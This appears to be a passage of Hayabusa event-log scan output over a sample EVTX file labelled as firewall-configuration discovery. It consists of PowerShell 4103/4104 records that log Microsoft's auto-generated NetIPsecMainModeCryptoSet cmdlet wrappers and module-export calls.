[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; 
value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): 
name=""Function""; value=""New-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.004 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } 
Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; 
